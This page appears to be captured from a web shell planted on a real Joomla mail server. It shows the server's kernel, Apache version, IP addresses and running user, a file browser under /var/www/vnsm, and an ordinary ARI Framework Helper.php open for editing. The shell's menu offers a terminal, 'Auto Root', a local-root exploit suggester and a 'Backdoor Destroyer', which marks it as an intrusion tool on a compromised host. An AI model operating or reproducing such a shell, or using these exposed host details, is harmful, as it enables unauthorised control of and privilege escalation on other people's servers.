Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
arisoft /
Arisoft /
Joomla /
Delete
Unzip
Name
Size
Permission
Date
Action
Document
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
Fields
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
Helper.php
721
B
-rwxr-xr-x
2018-04-20 12:55
index.html
31
B
-rwxr-xr-x
2018-04-20 12:55
Save
Rename
<?php /* * ARI Framework * * @package ARI Framework * @version 1.0.0 * @author ARI Soft * @copyright Copyright (c) 2010 www.ari-soft.com. All rights reserved * @license GNU/GPL (http://www.gnu.org/copyleft/gpl.html) * */ namespace Arisoft\Joomla; defined('_JEXEC') or die; use JHtml, JURI, JFactory; class Helper { static private $jsHelperLoaded = false; static public function registerJsHelper() { if (self::$jsHelperLoaded) return ; $uri = JURI::root(true). '/media/arisoft/'; $doc = JFactory::getDocument(); JHtml::_('jquery.framework', true); $doc->addScript($uri . 'joomla/helper.js'); self::$jsHelperLoaded = true; } }